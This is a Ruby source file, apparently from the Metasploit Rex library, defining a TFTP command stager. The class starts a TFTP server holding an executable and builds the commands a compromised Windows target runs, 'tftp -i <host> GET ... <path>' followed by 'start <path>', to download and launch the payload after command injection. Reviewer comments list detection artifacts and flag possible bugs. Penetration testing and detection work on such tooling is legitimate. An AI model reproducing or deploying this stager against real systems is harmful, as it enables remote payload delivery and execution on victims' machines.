Sha256: 56ff794eedb2fbd72b02e49365b74d94ca457caaf61ea95be793d76262bd6fa6
Contents?: true
Size: 1.85 KB
Versions: 7
Compression:
Stored size: 1.85 KB
Contents
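# -*- coding: binary -*-

require 'rex/text'
require 'rex/arch'
require 'msf/core/framework'

module Rex
  module Exploitation
    ###
    #
    # This class provides the ability to create a sequence of commands from an executable.
    # When this sequence is run via command injection or a shell, the resulting exe will
    # be written to disk and executed.
    #
    # This particular version uses tftp.exe to download a binary from the specified
    # server. The original file is preserved, not encoded at all, and so this version
    # is significantly simpler than other methods.
    #
    # Requires: tftp.exe, outbound udp connectivity to a tftp server
    #
    # Artifacts visible in this file (useful when writing detections or doing IR):
    #   * a "tftp -i <host> GET <id> <path>" command line on the target
    #   * a dropped file named with 8 random letters plus ".exe"
    #   * a separate "start <path>" command for that file
    #   * no delete command is emitted, so the dropped file stays on disk
    #
    # Written by Joshua J. Drake
    #
    ###
    class CmdStagerTFTP < CmdStagerBase
      # @param exe the executable handed to CmdStagerBase (exposed again through #exe)
      def initialize(exe)
        super
        # Random 8-letter file name used on the target side.
        @payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
      end

      #
      # Starts a TFTP server that serves the executable and registers it with
      # the module as a socket.
      #
      # The server is stored through the +tftp+ accessor. The previous code
      # assigned to a local variable named +tftp+, which left the accessor nil
      # and made #teardown fail with NoMethodError instead of stopping the server.
      #
      # NOTE(review): the name registered here is generated independently of the
      # opts[:transid] value used in #compress_commands; nothing in this file ties
      # the two together -- confirm against the caller.
      #
      # @param mod the module whose add_socket is called with the server
      #
      def setup(mod)
        self.tftp = Rex::Proto::TFTP::Server.new
        tftp.register_file(Rex::Text.rand_text_alphanumeric(8), exe)
        tftp.start
        mod.add_socket(tftp) # Hating myself for doing it... but it's just a first demo
      end

      #
      # Stops the TFTP server started by #setup. Does nothing when #setup was
      # never called, so cleanup paths can call it unconditionally.
      #
      # @param mod unused; kept for interface compatibility
      #
      def teardown(mod = nil)
        return unless tftp

        tftp.stop
      end

      #
      # We override compress commands just to stick in a few extra commands
      # last second..
      #
      # @param cmds [Array<String>] command list, appended to in place
      # @param opts [Hash] reads :tftphost, :transid and :nodelete
      #
      def compress_commands(cmds, opts)
        # @tempdir is not assigned anywhere in this file -- presumably the base
        # class sets it; verify.
        target_path = @tempdir + @payload_exe

        # Initiate the download
        cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{target_path}"

        # Make it all happen
        cmds << "start #{target_path}"

        # Clean up after unless requested not to..
        unless opts[:nodelete]
          # XXX: We won't be able to delete the payload while it is running..
        end

        super
      end

      # NOTE: We don't use a concatenation operator here since we only have a couple commands.
      # There really isn't any need to combine them. Also, the ms01_026 exploit depends on
      # the start command being issued separately so that it can ignore it :)

      attr_reader :exe
      attr_reader :payload_exe
      attr_accessor :tftp
    end
  end
end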